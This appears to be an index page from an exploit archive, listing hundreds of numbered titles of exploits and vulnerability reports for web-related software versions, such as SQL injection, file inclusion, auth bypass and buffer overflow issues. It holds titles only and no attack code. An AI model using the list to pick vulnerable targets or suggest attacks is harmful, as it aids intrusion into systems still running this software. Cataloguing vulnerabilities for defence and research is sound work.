[7653] Webspell 4 (Auth Bypass) SQL Injection Vulnerability
[7635] ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability
[7627] Pixel8 Web Photo Album 3.0 - Remote SQL Injection Vulnerability
[7617] SasCam WebCam Server 2.6.5 ActiveX Remote BOF Exploit
[7602] webClassifieds 2005 (Auth Bypass) SQL Injection Vulnerability
[7596] AlstraSoft Web Email Script Enterprise (id) SQL Injection Vuln
[7586] Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability
[7584] Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)
[7553] RoundCube Webmail <= 0.2b Remote Code Execution Exploit
[7549] RoundCube Webmail <= 0.2-3 beta Code Execution Vulnerability
[7525] Extract Website (download.php filename) File Disclosure Vulnerability
[7521] webcamXP 5.3.2.375 Remote File Disclosure Vulnerability
[7515] phpclanwebsite <= 1.23.3 fix pack #5 Multiple Vulnerabilities
[7488] Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability
[7467] Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC
[7465] isweb cms 3.0 (sql/xss) Multiple Vulnerabilities
[7445] Discussion Web 4 - Remote Database Disclosure Vulnerability
[7407] Webmaster Marketplace (member.php u) SQL Injection Vulnerability
[7388] webcaf <= 1.4 (lfi/rce) Multiple Vulnerabilities
[7298] Active Web Helpdesk 2 - (CategoryID) Blind SQL Injection Vulnerability
[7293] Active Web Helpdesk 2 - (Auth Bypass) SQL Injection Vulnerability
[7288] Active Web Mail 4 - Blind SQL Injection Vulnerability
[7281] Active Web Mail 4 - (Auth Bypass) Remote SQL Injection Vulnerability
[7279] eWebquiz 8 - (Auth Bypass) Remote SQL Injection Vulnerability
[7277] Active Websurvey 9.1 (Auth Bypass) Remote SQL Injection Vulnerability
[7265] web calendar system <= 3.40 (xss/sql) Multiple Vulnerabilities
[7252] Web Calendar 4.1 (Auth Bypass) SQL Injection Vulnerability
[7242] web calendar system 3.12/3.30 Multiple Vulnerabilities
[7236] WebStudio CMS - (pageid) Remote Blind SQL Injection Vulnerability (mil mixup)
[7225] pie web m{a,e}sher mod rss 0.1 - Remote File Inclusion Vulnerability
[7223] WebStudio eCatalogue (pageid) Blind SQL Injection Vulnerability
[7222] WebStudio eHotel (pageid) Blind SQL Injection Vulnerability
[7221] Pie Web M{a,e}sher 0.5.3 - Multiple Remote File Inclusion Vulnerability
[7216] WebStudio CMS (index.php pageid) Blind SQL Injection Vulnerability
[7215] bandwebsite 1.5 (sql/xss) Multiple Vulnerabilities
[7213] W3C Amaya 10.1 Web Browser (id) Remote Stack Overflow PoC
[7209] W3C Amaya 10.1 Web Browser (URL Bar) Remote Stack Overflow PoC
[7120] Bankoi Webhost Panel 1.20 (Auth Bypass) SQL Injection Vulnerability
[7116] AlstraSoft Web Host Directory 1.2 - Multiple Vulnerabilities
[7109] Pi3Web <= 2.0.3 (ISAPI) Remote Denial of Service Exploit
[7107] turnkeyforms Web Hosting Directory Multiple Vulnerabilities
[7103] AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln
[7049] Mini Web Calendar 1.2 (File Disclosure/XSS) Multiple Vulnerabilities
[7012] hMAilServer 4.4.2 (PHPWebAdmin) File Inclusion Vulnerabilities
[7005] PHP JOBWEBSITE PRO (Auth Bypass) SQL Injection Vulnerability
[6989] WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln
[6986] WEBBDOMAIN Webshop <= 1.02 (SQL Injection) Auth Bypass Vuln
[6985] WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection Vulnerability
[6984] WEBBDOMAIN Polls 1.01 (SQL Injection) Auth Bypass Vulnerability
[6983] WEBBDOMAIN Petition 1.02/2.0/3.0 (SQL Injection) Auth Bypass Vuln
[6977] WEBBDOMAIN Post Card <= 1.02 (catid) SQL Injection Vulnerability
[6974] WEBBDOMAIN WebShop 1.02 (SQL/XSS) Multiple Vulnerabilities
[6922] SFS EZ Webstore (where) Remote SQL Injection Vulnerability
[6913] SFS EZ Webring (cat) Remote SQL Injection Vulnerability
[6909] Adult Banner Exchange Website (targetid) SQL Injection Vulnerability
[6898] U-Mail Webmail 4.91 (edit.php) Arbitrary File Write Vulnerability
[6869] WebCards <= 1.3 - Remote SQL Injection Vulnerability
[6822] websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities
[6771] Calendars for the Web 4.02 Admin Auth Bypass Vulnerability
[6755] PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit
[6703] WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Remote Vulnerabilities
[6669] JMweb Multiple (src) Local File Inclusion Vulnerabilities
[6653] OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability
[6614] Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash
[6610] ParsaWeb CMS (Search) Remote SQL Injection Vulnerability
[6577] PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability
[6576] Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability
[6556] webcp 0.5.7 (filelocation) Remote File Disclosure Vulnerability
[6544] WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability
[6542] JETIK-WEB Software (sayfa.php kat) SQL Injection Vulnerability
[6539] Sofi WebGui <= 0.6.3 PRE (mod_dir) Remote File Inclusion Vulnerability
[6450] Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit
[6448] WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability
[6443] WebPortal CMS <= 0.7.4 (download.php aid) SQL Injection Exploit
[6440] PhpWebGallery 1.3.4 - Remote Blind SQL Injection Exploit
[6439] Sports Clubs Web Panel 0.0.1 - Remote File Upload Vulnerability
[6436] PhpWebGallery 1.3.4 (cat) Blind SQL Injection Vulnerability
[6435] Sports Clubs Web Panel 0.0.1 (id) SQL Injection Vulnerabilities
[6427] Sports Clubs Web Panel 0.0.1 (p) Local File Inclusion Vulnerability
[6425] PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities
[6420] aspwebalbum 3.2 - Multiple Vulnerabilities
[6414] Peachtree Accounting 2004 (PAWWeb11.ocx) ActiveX Insecure Method
[6410] Kim Websites 1.0 (fckeditor) Remote Arbitrary File Upload Vulnerability
[6391] Flock Social Web Browser 1.2.5 (loop) Remote Denial of Service Exploit
[6370] WebCMS Portal Edition (index.php id) Blind SQL Injection Exploit
[6361] Living Local Website (listtest.php r) SQL Injection Vulnerability
[6357] aspwebalbum 3.2 (upload/sql/xss) Multiple Vulnerabilities
[6344] WeBid 0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
[6341] WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability
[6339] webid 0.5.4 - Multiple Vulnerabilities
[6335] Web Directory Script 1.5.3 (site) SQL Injection Vulnerability
[6303] WebBoard <= 2.0 Arbitrary SQL Question/Answer Delete Vulnerability
[6298] Web Directory Script <= 2.0 (name) SQL Injection Vulnerability
[6281] webEdition CMS (we_objectID) Blind SQL Injection Exploit
[6278] Anzio Web Print Object <= 3.2.30 ActiveX Buffer Overflow Exploit
[6225] PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability
[6220] Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
[6151] velocity web-server 1.0 - Directory Traversal file download vulnerability
[6136] phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vuln
[6115] EZWebAlbum Insecure Cookie Handling Vulnerability
[6112] EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability
[6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
[6081] Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
[6079] Comdev Web Blogger <= 4.1.3 (arcmonth) SQL Injection Vulnerability
[6075] Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability
[6064] Maian Weblog <= 4.0 Insecure Cookie Handling Vulnerability
[6056] WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
[6037] phpDatingClub (website.php page) Local File Inclusion Vulnerability
[6015] WebXell Editor 0.1.3 - Arbitrary File Upload Vulnerability
[5999] phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability
[5998] phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability
[5997] CMS WebBlizzard (index.php page) Blind SQL Injection Exploit
[5993] Joomla Component com_brightweblinks (catid) SQL Injection Vulnerability
[5985] VanGogh Web CMS 0.9 (article_ID) Remote SQL Injection Vulnerability
[5972] RCM Revision Web Development (products.php) SQL Injection Vulnerability
[5966] Joomla Component Xe webtv (id) Blind SQL Injection Exploit
[5956] Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability (1st)
[5950] Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability
[5949] Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability
[5948] Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability
[5947] Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability
[5946] Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability
[5940] Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability
[5932] Webdevindo-CMS 0.1 (index.php hal) Remote SQL Injection Vulnerability
[5918] uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit
[5912] MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability
[5867] AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability
[5861] Academic Web Tools CMS <= 1.4.2.8 - Multiple Vulnerabilities
[5856] nweb2fax <= 0.2.7 - Multiple Vulnerabilities
[5855] Easy Webstore 1.2 (index.php postid) Remote SQL Injection Vulnerability
[5850] AspWebCalendar 2008 Remote File Upload Vulnerability
[5847] WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability
[5830] NiTrO Web Gallery <= 1.4.3 (section) Remote SQL Injection Vulnerability
[5807] PHP JOBWEBSITE PRO (JobSearch3.php) SQL Injection Vulnerability
[5802] WebChamado 1.1 (tsk_id) Remote SQL Injection Vulnerability
[5798] WebChamado 1.1 Arbitrary Add Admin Exploit
[5763] real estate web site 1.0 (sql/xss) Multiple Vulnerabilities
[5760] Galatolo Web Manager <= 1.0 - Remote SQL Injection Exploit
[5758] Galatolo Web Manager 1.0 XSS / Local File Inclusion Vulnerability
[5725] smeweb 1.4b (sql/xss) Multiple Vulnerabilities
[5664] webløsninger <= 4 - (xss/sql) Multiple Vulnerabilities
[5641] CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities
[5638] How2ASP.net Webboard <= 4.1 - Remote SQL Injection Vulnerability
[5635] Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit
[5633] StanWeb.CMS (default.asp id) Remote SQL Injection Exploit
[5629] Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln
[5606] Web Group Communication Center (WGCC) <= 1.0.3 - SQL Injection Vuln
[5548] Miniweb 2.0 (historymonth) Remote SQL Injection Vulnerability
[5536] HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit
[5534] HLDS WebMod 0.48 Multiple Remote Vulnerabilities
[5527] Joomla Component Webhosting (catid) Blind SQL Injection Exploit
[5517] Softbiz Web Host Directory Script (host_id) SQL Injection Vulnerability
[5485] Web Calendar <= 4.1 - Blind SQL Injection Exploit
[5354] Xitami Web Server 2.5c2 - LRWP Processing Format String PoC
[5331] Neat weblog 0.2 (articleId) Remote SQL Injection Vulnerability
[5304] HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability
[5268] Apple Safari (webkit) Remote Denial of Service Exploit (iphone/osx/win)
[5255] eXV2 Module WebChat 1.60 - (roomid) Remote SQL Injection Vulnerability
[5215] Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability
[5212] MiniWebSvr 0.0.9a Remote Directory Traversal Vulnerability
[5185] PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability
[5182] Portail Web Php <= 2.5.1.1 - Multiple Inclusion Vulnerabilities
[5137] XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
[5116] artmedic weblog 1.0 - Multiple Local File Inclusion Vulnerabilities
[5111] IBM Domino Web Access Upload Module - SEH Overwrite Exploit
[5060] VHD Web Pack 2.0 (index.php page) Local File Inclusion Vulnerability
[4982] Gateway WebLaunch ActiveX Remote Buffer Overflow Exploit
[4972] Web Wiz NewsPad 1.02 (sub) Remote Directory Traversal Vulnerability
[4971] web wiz rich text editor 4.0 - Multiple Vulnerabilities
[4970] Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal Vulnerability
[4959] HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit
[4944] 360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability
[4923] miniweb 0.8.19 Multiple Vulnerabilities
[4921] MailBee WebMail Pro 4.1 (ASP.NET) Remote File Disclosure Vulnerability
[4913] Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
[4872] PHP Webquest 2.6 Get Database Credentials Vulnerability
[4869] Gateway Weblaunch ActiveX Control Insecure Method Exploit
[4867] PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit
[4850] Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability
[4846] Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure Vulnerability
[4836] samPHPweb (songinfo.php) Remote SQL Injection Vulnerability
[4835] WebPortal CMS 0.6-beta Remote Password Change Exploit
[4834] samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability
[4828] AGENCY4NET WEBFTP 1 download2.php File Disclosure Vulnerability
[4826] WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit
[4820] IBM Domino Web Access Upload Module dwa7w.dll BoF Exploit
[4819] Macrovision Installshield isusweb.dll SEH Overwrite Exploit
[4818] IBM Domino Web Access Upload Module inotes6.dll BoF Exploit
[4777] WebSihirbazi 5.1.1 (pageid) Remote SQL Injection Vulnerability
[4748] SurgeMail v.38k4 webmail Host header Denial of Service Exploit
[4744] rooter VDSL Device (Goahead WEBSERVER) Disclosure Vulnerability
[4743] FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit
[4740] FreeWebshop 2.2.1 - Remote Blind SQL Injection Exploit
[4739] MOG-WebShop (index.php group) Remote SQL Injection Exploit
[4719] Mcms Easy Web Make (index.php template) Local File Inclusion Vuln
[4696] SerWeb <= 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities
[4677] WebED 0.0.9 (index.php) Remote File Disclosure Vulnerability
[4676] Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability
[4653] WorkingOnWeb 2.0.1400 events.php Remote SQL Injection Vulnerability
[4579] GOM Player 2.1.6.3499 (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit
[4556] LiteSpeed Web Server <= 3.2.3 - Remote Source Code Disclosure Vuln
[4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
[4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
[4518] WebDesktop 0.1 - Remote File Inclusion Vulnerabilities
[4482] Web Template Management System 1.3 - Remote SQL Injection
[4450] Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)
[4407] PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit
[4384] WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities
[4370] Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection Vulnerability
[4362] Web Oddity Web Server 0.09b Directory Traversal Exploit
[4352] Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities
[4335] Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
[4286] IBM Rational ClearQuest Web Login Bypass SQL Injection Vulnerability
[4284] Prozilla Webring Website Script (category.php cat) Remote SQL Injection
[4224] Webyapar 2.0 - Multiple Remote SQL Injection Vulnerabilities
[4168] Sun Java WebStart JNLP Stack Buffer Overflow Exploit PoC
[4157] SAP DB 7.4 WebTools Remote SEH overwrite Exploit
[4129] Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion Vulns
[4125] WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
[4112] EVA-Web 1.1<= 2.2 (index.php3) Remote File Inclusion Vulnerabilities
[4097] dagger web engine <= 23jan2007 - Remote File Inclusion Vulnerability
[4089] SerWeb 0.9.4 (load_lang.php) Remote File Inclusion Exploit
[4083] W1L3D4 WEBmarket 0.1 - Remote SQL Injection Vulnerability
[4053] Yahoo! Messenger Webcam 8.1 (Ywcupl.dll) Download / Execute Exploit
[4052] Yahoo! Messenger Webcam 8.1 (Ywcvwr.dll) Download / Execute Exploit
[4046] MiniWeb Http Server 0.8.x Remote Denial of Service Exploit
[4043] Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit 2
[4042] Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit
[4031] Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
[3987] Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability
[3922] webdesproxy 0.0.1 (GET Request) Remote Root Exploit (exec-shield)
[3913] webdesproxy 0.0.1 (GET Request) Remote Buffer Overflow Exploit
[3859] Archangel Weblog 0.90.02 Local File Inclusion / Admin Bypass Vulns
[3795] Advanced Webhost Billing System (AWBS) cart2.php RFI Vulnerability
[3778] WEBInsta FM 0.1.4 login.php absolute_path Remote File Inclusion Exploit
[3774] PHP-Ring Webring System 0.9 - Remote SQL Injection Vulnerability
[3745] Web Slider 0.6 (path) Remote File Inclusion Vulnerabilities
[3717] WebKalk2 1.9.0 (absolute_path) Remote File Inclusion Vulnerability
[3708] MiniWebsvr 0.0.7 - Remote Directory Transversal Exploit
[3673] WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability
[3622] WinMail Server 4.4 build 1124 (WebMail) Remote Add Super User Exploit
[3592] Web Content System 2.7.1 - Remote File Inclusion Exploit
[3589] NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)
[3558] eWebquiz <= 8 - (eWebQuiz.asp) Remote SQL Injection Exploit
[3546] aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection Vulnerability
[3542] ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities
[3492] WebCalendar 0.9.45 (includedir) Remote File Inclusion Vulnerability
[3485] Company WebSite Builder PRO 1.9.8 (INCLUDE_PATH) RFI Vulnerability
[3484] WebLog (index.php file) Remote File Disclosure Vulnerability
[3473] WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability
[3436] WEBO (Web Organizer) <= 1.0 (baseDir) Remote File Inclusion Vuln
[3402] webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
[3400] webSPELL <= 4.01.02 Multiple Remote SQL Injection Exploit
[3395] WebMod 0.48 (Content-Length) Remote Buffer Overflow Exploit PoC
[3392] DivX Web Player 1.3.0 (npdivx32.dll) Remote Denial of Service Exploit
[3381] NetProxy <= 4.03 Web Filter Evasion / Bypass Logging Exploit
[3351] webSPELL <= 4.01.02 (topic) Remote SQL Injection Exploit
[3339] Online Web Building 2.0 (id) Remote SQL Injection Vulnerability
[3325] webSPELL 4.01.02 (showonly) Remote Blind SQL Injection Exploit
[3304] MiniWebsvr <= 0.0.6 - Remote Resource Consumption DoS Exploit
[3302] Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit
[3291] SAP Web Application Server 6.40 Arbitrary File Disclosure Exploit
[3281] WebMatic 2.6 (index_album.php) Remote File Include Vulnerability
[3250] Portail Web Php <= 2.5.1 (includes.php) Remote File Inclusion Vuln
[3249] WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability
[3222] Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability
[3172] webSPELL 4.01.02 (gallery.php) Remote Blind SQL Injection Exploit
[3169] WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln
[3163] Neon Labs Website <= 3.2 (nl.php g_strRootDir) Remote Inclusion Vuln
[3138] Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit
[3135] Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability
[3123] FdWeB Espace Membre <= 2.01 (path) Remote File Include Exploit
[3105] MOTIONBORG Web Real Estate <= 2.1 - SQL Injection Vulnerability
[3100] Magic Photo Storage Website _config[site_path] File Include Vuln
[3098] OmniWeb 5.5.1 Javascript alert() Remote Format String PoC
[3092] NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit meta
[3076] Simple Web Content Management System Remote SQL Injection Exploit
[3038] Durian Web Application Server 3.02 Denial of Service Exploit
[3037] Durian Web Application Server 3.02 Remote Buffer Overflow Exploit
[3036] WebText <= 0.4.5.2 - Remote Code Execution Exploit
[3034] AIDeX Mini-WebServer <= 1.1 - Remote Denial of Service Crash Exploit
[2996] Enthrallweb eNews 1.0 - Remote User Pass Change Exploit
[2995] Enthrallweb eCoupons 1.0 - (myprofile.asp) Remote Pass Change Exploit
[2994] Enthrallweb eClassifieds 1.0 - Remote User Pass Change Exploit
[2991] Enthrallweb ePages (actualpic.asp) Remote SQL Injection Exploit
[2990] Enthrallweb emates 1.0 (newsdetail.asp) Remote SQL Injection Exploit
[2989] Enthrallweb eCars 1.0 (types.asp) Remote SQL Injection Vulnerability
[2988] Enthrallweb eJobs (newsdetail.asp) Remote SQL Injection Exploit
[2987] Enthrallweb eHomes 1.0 - Multiple (SQL/XSS) Vulnerabilities
[2986] Enthrallweb ePhotos 1.0 (subLevel2.asp) SQL Injection Vulnerability
[2974] Http explorer Web Server 1.02 Directory Transversal Vulnerability
[2939] mxBB Module WebLinks <= 2.05 Remote Inclusion Vulnerability
[2938] Bandwebsite <= 1.5 (Login) Remote Add Admin Exploit
[2920] Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability
[2835] Wallpaper Complete Website 1.0.09 Remote SQL Injection Vulnerabilities
[2834] Recipes Complete Website 1.1.14 Remote SQL Injection Vulnerabilities
[2811] phpWebThings <= 1.5.2 (editor.php) Remote File Include Vulnerability
[2788] Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)
[2722] Webdrivers Simple Forum (message_details.php) SQL Injection Exploit
[2716] Essentia Web Server 2.15 (GET Request) Remote DoS Exploit
[2704] freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities
[2699] EFS Easy Address Book Web Server <= 1.2 - Remote File Stream Exploit
[2690] Easy File Sharing Web Server 4 Remote Information Stealer Exploit
[2673] Simple Website Software 0.99 (common.php) File Include Vulnerability
[2651] MiniHttpServer Web Forum & File Sharing Server 4.0 Add User Exploit
[2626] MDweb <= 1.3 (chemin_appli) Remote File Include Vulnerabilities
[2611] Trawler Web CMS <= 1.8.1 - Multiple Remote File Include Vulnerabilities
[2568] webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit
[2561] NuralStorm Webmail <= 0.98b (process.php) Remote Include Vulnerability
[2496] WebYep <= 1.1.9 (webyep_sIncludePath) File Include Vulnerabilities
[2462] phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities
[2461] VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability
[2460] MS Internet Explorer WebViewFolderIcon setSlice() Exploit (c)
[2458] MS Internet Explorer WebViewFolderIcon setSlice() Exploit (pl)
[2451] phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability
[2448] MS Internet Explorer WebViewFolderIcon setSlice() Exploit (html)
[2445] NaviCOPA Web Server 2.01 (GET) Remote Buffer Overflow Exploit
[2440] MS Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit
[2435] WEB//NEWS <= 1.4 (parser.php) Remote File Include Vulnerability
[2419] Web-News <= 1.6.3 (template.php) Remote File Include Vulnerability
[2416] xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability
[2404] Dr.Web Antivirus 4.33 (LHA long directory name) Local Overflow Exploit
[2398] Digital WebShop <= 1.128 Multiple Remote File Include Vulnerabilities
[2352] webSPELL <= 4.01.01 Database Backup Download Vulnerability
[2335] MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities
[2318] Web Server Creator 0.1 - (l) Remote Include Vulnerability
[2269] Web3news <= 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln
[2257] CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability
[2189] WEBInsta CMS <= 0.3.1 (users.php) Remote File Include Vulnerability
[2187] WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit
[2177] Joomla Webring Component <= 1.0 - Remote Include Vulnerability
[2175] WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit
[2171] WEBInsta MM 1.3e (cabsolute_path) Remote File Include Vulnerability
[2167] SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability
[2158] TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities
[2149] Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability
[2123] SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability
[2113] SaveWeb Portal <= 3.4 (SITE_Path) Remote File Inclusion Vulnerabilities
[2017] Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)
[1997] Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit
[1972] Opera Web Browser 9.00 (iframe) Remote Denial of Service Exploit
[1941] Mambo <= 4.6rc1 (Weblinks) Remote Blind SQL Injection Exploit (2)
[1930] WeBBoA Host Script 1.1 - Remote SQL Injection Vulnerability
[1922] Joomla <= 1.0.9 (Weblinks) Remote Blind SQL Injection Exploit
[1920] Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit
[1907] aWebNews <= 1.5 (visview.php) Remote File Include Vulnerability
[1898] WebprojectDB <= 0.1.3 (INCDIR) Remote File Include Vulnerability
[1871] WebspotBlogging <= 3.0.1 (path) Remote File Include Vulnerability
[1859] aspWebLinks 2.0 - Remote SQL Injection / Admin Pass Change Exploit
[1841] F@cile Interactive Web <= 0.8x Remote (Include / XSS) Vulnerabilities
[1827] V-Webmail <= 1.6.4 (pear_dir) Remote File Include Vulnerability
[1819] PunkBuster < 1.229 (WebTool Service) Remote Buffer Overflow DoS
[1681] Sybase EAServer 5.2 (WebConsole) Remote Stack Overflow Exploit
[1673] phpWebSite <= 0.10.2 (hub_dir) Remote Commands Execution Exploit
[1619] GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)
[1618] GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)
[1608] WebAlbum <= 2.02pl COOKIE[skin2] Remote Code Execution Exploit
[1527] iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit
[1525] phpWebSite <= 0.10.0-full (topics.php) Remote SQL Injection Exploit
[1522] NOCC Webmail <= 1.0 (Local Inclusion) Remote Code Execution Exploit
[1498] webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit
[1480] Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)
[1474] Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux)
[1453] Phpclanwebsite 1.23.1 (par) Remote SQL Injection Exploit
[1399] WebWiz Products (1.0 , <= 3.06) - Login Bypass SQL Injection Exploits
[1387] Dev Web Management System <= 1.5 (cat) Remote SQL Injection Exploit
[1363] Website Baker <= 2.6.0 Login Bypass / Remote Code Execution Exploit
[1325] PHPWebThings <= 1.4 (forum) SQL Injection Exploit
[1324] PHPWebThings <= 1.4 (msg/forum) SQL Injection Exploit
[1274] Hasbani-WindWeb/2.0 - HTTP GET Remote DoS
[1260] MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)
[1252] MuOnline Loopholes Web Server (pkok.asp) SQL Injection Exploit
[1239] Virtools Web Player <= 3.0.0.100 Buffer Overflow DoS Exploit
[1220] Fastream NETFile Web Server <= 7.1.2 (HEAD) DoS Exploit
[1217] phpWebSite <= 0.10.0 (module) SQL Injection Exploit
[1210] WebAdmin <= 2.0.4 USER Buffer Overflow Exploit
[1194] man2web <= 0.88 Multiple Remote Command Execution Exploit (update2)
[1184] Savant Web Server 3.1 - Remote Buffer Overflow Exploit
[1099] Baby Web Server <= 2.6.2 Command Validation Exploit
[1085] Willing Webcam 2.8 Licence Info Disclosure Local Exploit
[1077] Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit
[1048] eXtropia Shopping Cart web_store.cgi Remote Exploit
[1041] Webhints <= 1.03 Remote Command Execution Exploit (perl code) (3)
[1040] Webhints <= 1.03 Remote Command Execution Exploit (c code) (2)
[1039] Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
[1012] Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html)
[1011] Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php)
[1010] Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl)
[1005] WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st)
[1004] WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)
[978] Ashley's Web Server Denial of Service Exploit
[960] MySQL MaxDB Webtool <= 7.5.00.23 Remote Stack Overflow Exploit
[949] PMsoftware Simple Web Server 1.0 - Remote Stack Overflow Exploit
[945] PMSoftware Simple Web Server (GET Request) Remote BoF Exploit
[944] WheresJames Webcam Publisher Beta 2.0.0014 Remote Buffer Overflow
[891] MCPWS Personal WebServer <= 1.3.21 Denial of Service Exploit
[864] phpWebLog <= 0.5.3 Arbitrary File Inclusion
